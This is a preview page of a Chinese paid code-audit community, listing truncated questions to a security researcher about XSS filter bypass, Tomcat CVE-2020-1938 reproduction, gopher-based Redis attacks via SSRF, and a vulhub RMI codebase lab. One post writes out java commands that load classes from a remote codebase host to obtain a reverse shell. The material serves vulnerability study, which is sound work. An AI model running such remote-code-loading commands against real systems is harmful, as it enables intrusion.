你尚未登录

未加入『代码审计』知识星球的用户只能查看少量内容,且不能下载附件。 加入『代码审计』知识星球即可查看所有内容。

2023 五月 06
@Enough.:

p🐮,我遇到一个xss问题,在测试一套exe系统的时候,他内嵌了一个miniblink浏览器,我可以在返回内容里面插入xss,但是F12查看所有非他官方域名的URL都会提示black list,网上搜了一圈也没找到关于Miniblink是否可以设置白名单网页的文章,或者说这种情况还能绕过url限制吗

没用过miniblink,黑名......
2023 四月 03
@anlan:

p牛,最近想学习tomcat的漏洞复现,买了一本《深入剖析tomcat》的书,把书上的demo都实现了一遍。我在阅读tomcat4或5版本的时候,代码的逻辑还能缕清楚。 但是想要复现cve-2020-1938的时候,就搞不清楚代码的执行逻辑了,感觉非常混乱。 p牛,我想知道你是如何审计这种大型程序的源码?

审计(分析)漏洞前先阅读并理解软件架构和代码。 你在读书的时候,你的目的是阅读tomcat......
2023 一月 07
@CCLH:

我有个问题想问师傅们。你们用过正版的burpsuite吗?用burpsuite扫到漏洞是否跟正版盗版有关系呢?

我们公司是正版......
2022 七月 22
@笑忘洛神:

请问p神。在php7下, 漏洞函数为readfile($url); 但是限制了开头为http://,请问还能使用gopher协议攻击redis3版本吗? 测试readfile重定向不支持gopher协议

......
2022 六月 03
@张振峰:

有没有国外开源的java cms,想审计学习下,能推荐几个吗?

按照我在这篇文章里提的方法:https://www.leavesongs.com/PENETR......
2022 五月 14
@Mr.Lee:

大佬,在网上看了你的一批关于zabbix sso单点登录认证绕过的漏洞分析,我在复现的时候搭建sso认证服务器的失败了,大佬有搭建环境的过程嘛

2022 四月 27
@路人甲:

p牛您好~ 请问php审计和java审计有没有什么关联捏,听别的师傅说php审计很厉害了才能去做java审计……那么我这种新人该怎么开始审计之旅捏? 我是刚入行的新人,对审计很感兴趣……但是在此之前不是后端程序员出身,大学期间多半在刷算法,不知道在审计这块学习路线是怎样的~望指点😆

他们的关联就是都是编程语言......
2022 一月 23
@abcd:

p神,你昨天晚上分享的那个rmi工具,提到了这个 - 绕过localhost限制来执行bind、unbind等写入操作(CVE-2019-2684) 翻了一下好像没找到哪里有对这个cve的相关分析,不知道是不是没找到,师傅有看到过吗

我......

图片


2022 一月 23
@路人甲:

尝试复现vulhub中的rmi-codebase,远程codebase上托管的payload如下,客户端调用都返回了7,怎么没有反弹shell呢,换成其他命令执行也不行。 具体步骤如下: 1.编译远程codebase上的RMIClient类及其内部类,并开启http服务; 2.运行rmiserver端,java -Djava.rmi.server.hostname=127.0.0.1 -Djava.rmi.server.useCodebaseOnly=false -Djava.security.policy=client.policy RemoteRMIServer; 3.运行rmiclient端,java -Djava.rmi.server.useCodebaseOnly=false -Djava.rmi.server.codebase=http://x.x.x.x:9980/ RMIClient 现象:http server收到了获取class的请求;client端未报错,输出7

可以回顾一下《Java安全漫谈》第一篇文章,里面有介绍下图三种初始化的代码在Java中有什么不......

图片


2021 十二月 29
@test:

你好,我这边代码审计扫码之后,官网没有反应,没有自动登录,请问这种情况怎么处理?

不好意思,......